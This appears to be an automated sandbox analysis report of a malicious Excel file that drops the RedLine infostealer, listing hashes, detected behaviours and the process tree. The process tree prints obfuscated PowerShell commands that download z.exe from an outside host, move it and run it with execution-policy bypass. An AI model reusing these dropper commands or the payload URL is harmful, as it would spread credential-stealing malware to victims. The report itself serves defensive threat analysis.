Analysis
-
max time kernel
146s -
max time network
129s -
platform
windows10_x64 -
resource
win10v20201028 -
submitted
10-02-2021 07:49
Behavioral task
behavioral1
Sample
order_list_fe99087.xls
Resource
win7v20201028
Behavioral task
behavioral2
Sample
order_list_fe99087.xls
Resource
win10v20201028
General
-
Target
order_list_fe99087.xls
-
Size
221KB
-
MD5
aeb9b7f6fb7bac0deac61db8295e1d3c
-
SHA1
823814c91d8c75933f0f49cda5b07ac14e484390
-
SHA256
ce07dc9b67f4e91fb0254421599c3344f60732b99c24d39d4f2a5b8e93da56ef
-
SHA512
cc3c349fdb18bbac96f36cff152c8c4873d10179cc6dab06863ac421ffc9b8d75f67c991522eaea736bc58aef3a7c172811e12f3ae08e4ebe6e32417456e936c
Malware Config
Extracted
http://urgfuid.gq/z/z.exe
Signatures
-
Process spawned unexpected child process 3 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
Processes:
powershell.exepowershell.exepowershell.exedescription pid pid_target process target process Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 1864 1304 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2160 1304 powershell.exe EXCEL.EXE Parent C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE is not expected to spawn this process 2624 1304 powershell.exe EXCEL.EXE -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 2 IoCs
Processes:
resource yara_rule behavioral2/memory/4512-40-0x0000000004110000-0x000000000413C000-memory.dmp family_redline behavioral2/memory/4512-46-0x0000000004380000-0x00000000043AA000-memory.dmp family_redline -
Blocklisted process makes network request 1 IoCs
Processes:
powershell.exeflow pid process 17 1864 powershell.exe -
Executes dropped EXE 2 IoCs
Processes:
z.exeo.exepid process 4512 z.exe 4792 o.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Checks processor information in registry 2 TTPs 3 IoCs
Processor information is often read in order to detect sandboxing environments.
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\CentralProcessor\0 EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString EXCEL.EXE -
Enumerates system info in registry 2 TTPs 3 IoCs
Processes:
EXCEL.EXEdescription ioc process Key opened \REGISTRY\MACHINE\Hardware\Description\System\BIOS EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemFamily EXCEL.EXE Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU EXCEL.EXE -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
Processes:
EXCEL.EXEpid process 1304 EXCEL.EXE -
Suspicious behavior: EnumeratesProcesses 31 IoCs
Processes:
powershell.exepowershell.exepowershell.exez.exeo.exepid process 1864 powershell.exe 2160 powershell.exe 2624 powershell.exe 2160 powershell.exe 2624 powershell.exe 1864 powershell.exe 2160 powershell.exe 2624 powershell.exe 1864 powershell.exe 4512 z.exe 4512 z.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe 4792 o.exe -
Suspicious use of AdjustPrivilegeToken 5 IoCs
Processes:
powershell.exepowershell.exepowershell.exez.exeo.exedescription pid process Token: SeDebugPrivilege 1864 powershell.exe Token: SeDebugPrivilege 2624 powershell.exe Token: SeDebugPrivilege 2160 powershell.exe Token: SeDebugPrivilege 4512 z.exe Token: SeDebugPrivilege 4792 o.exe -
Suspicious use of FindShellTrayWindow 2 IoCs
Processes:
EXCEL.EXEpid process 1304 EXCEL.EXE 1304 EXCEL.EXE -
Suspicious use of SetWindowsHookEx 15 IoCs
Processes:
EXCEL.EXEo.exepid process 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 1304 EXCEL.EXE 4792 o.exe -
Suspicious use of WriteProcessMemory 11 IoCs
Processes:
EXCEL.EXEpowershell.exez.exedescription pid process target process PID 1304 wrote to memory of 1864 1304 EXCEL.EXE powershell.exe PID 1304 wrote to memory of 1864 1304 EXCEL.EXE powershell.exe PID 1304 wrote to memory of 2160 1304 EXCEL.EXE powershell.exe PID 1304 wrote to memory of 2160 1304 EXCEL.EXE powershell.exe PID 1304 wrote to memory of 2624 1304 EXCEL.EXE powershell.exe PID 1304 wrote to memory of 2624 1304 EXCEL.EXE powershell.exe PID 2624 wrote to memory of 4512 2624 powershell.exe z.exe PID 2624 wrote to memory of 4512 2624 powershell.exe z.exe PID 2624 wrote to memory of 4512 2624 powershell.exe z.exe PID 4512 wrote to memory of 4792 4512 z.exe o.exe PID 4512 wrote to memory of 4792 4512 z.exe o.exe
Processes
-
C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE"C:\Program Files\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Admin\AppData\Local\Temp\order_list_fe99087.xls"1⤵
- Checks processor information in registry
- Enumerates system info in registry
- Suspicious behavior: AddClipboardFormatListener
- Suspicious use of FindShellTrayWindow
- Suspicious use of SetWindowsHookEx
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 (nEw-oB`jecT Net.WebCL`I`eNT).('Down'+'loadFile').Invoke('http://urgfuid.gq/z/z.exe','z.exe')2⤵
- Process spawned unexpected child process
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1864 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 Start-Sleep 20; Move-Item "z.exe" -Destination "${enV`:appdata}"2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2160 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -w 1 -EP bypass Start-Sleep 25; cd ${enV`:appdata};.('.'+'/z.exe')2⤵
- Process spawned unexpected child process
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2624 -
C:\Users\Admin\AppData\Roaming\z.exe"C:\Users\Admin\AppData\Roaming\z.exe"3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:4512 -
C:\Users\Admin\AppData\Local\Temp\o.exe"C:\Users\Admin\AppData\Local\Temp\o.exe"4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of SetWindowsHookEx
PID:4792
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
MD5
d737fc27bbf2f3bd19d1706af83dbe3f
SHA1212d219394124968b50769c371121a577d973985
SHA256b96b55a2acd9c790092e8132b31e5f0110492f98828098112d46f2f9faa2b982
SHA512974c2db081dd6d1f45763371c41e01173b189ea1a2d893d0bc415670bfa12f3934ba9dea64018b8c063017454d4d92888d6fe6eaad1659e420ba9adcde5e788b
-
MD5
4535f96e055bf316b898dd294d34c7dc
SHA1285a45622c61bb703e534ea029b49a78b64cd6bc
SHA256d428372a6678f12b4d2283043af39d08285dfdc90943bef4a5e6f6e7111d2b7b
SHA5129740c2028b0a9a454658a83115f1953758fde47e6057718c6f31041174d17e83e11316938d1b21a6f5e7f561708f62a68481c5b8f0f86d88071fb176cd2a5bac
-
MD5
8af6efbaab75973315f4fa4633a1f900
SHA1ddaf8d6d0723883e4bbb1510e004ba4f5c6371c0
SHA256f65bfb7acb6780c4d85e3220bb104f91b50fd722c213fd8f765ee81a3700212d
SHA51252049b8a4881f64b0451d1351cd5709f6c3823260f493151e24e1704362fe5861ee7dc5afb1e3bcfd5dcda3493cf39e94e819e4e7291e9c0e6b6cf9a7f862f19
-
MD5
f254515cdf3cf10e1555046493c5bee8
SHA14eee393ad747349fda88bf5690dbb60aa450eced
SHA25624be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e
SHA512c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1
-
MD5
f254515cdf3cf10e1555046493c5bee8
SHA14eee393ad747349fda88bf5690dbb60aa450eced
SHA25624be4bd66f7e47dee0a64925c1ceee243396c06d18c00fb16ce54204cb9b096e
SHA512c6e06be4c7b9150e99d1708b6b45153de4d850490274ea6672177bcbbdde676aed3a2a038dd14936b54b68bcc46f7fdc382db82a26b5776e9ca81d6dc14362b1
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD544dbfb1a22a74b96675ad8e22dc43fde
SHA1d649e0d57674999eef40fdb41a8c6b9e8f728695
SHA256b99546ba0e4d0ee8842ff3cbce5c392b160cde9167917846dfa00d3a3107b33e
SHA51261664123b2503bd681a1318c38cc144cffecea60d5ead6950eafa845e00ea3d4537bfc1857b9b100fd1cf2b66996b2847d11ddd9b4ee8491a80f6349d3a3e874
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
MD5938af8bfbd5bb9caec62a56722d34fe7
SHA12d49fcf914a8148f0e3b1327cfac72ee6a7e0fa3
SHA256f6eb69350a275e782aa7a688d624e734824c1226ad58902c71ad86f958d0255d
SHA512bf36a8a2599cb61f5a9e93106e2fe7a08733e36d6737bacce798d7755bac7a72bdcf200bbfd75677939c412736c8708d9a9df157f498663a793cc8a7a7891abc
-
MD5
feb57ff3d961685dc7a12fcb2ef8ba63
SHA19fbceb22b3468083f3aa583e4183f4c9e407bcd9
SHA25697059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853
SHA5128d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8
-
MD5
feb57ff3d961685dc7a12fcb2ef8ba63
SHA19fbceb22b3468083f3aa583e4183f4c9e407bcd9
SHA25697059b74b76a880fae49ca4bfa64953cb694e60195a387018440066e5c0cf853
SHA5128d61eac914c1cfc296e898772505a3646ede92e20855da5e5d0271fc856143a486f3efde7172ae09b46a4cbdfd37d547afddb86f3e5946a460372986fa0759a8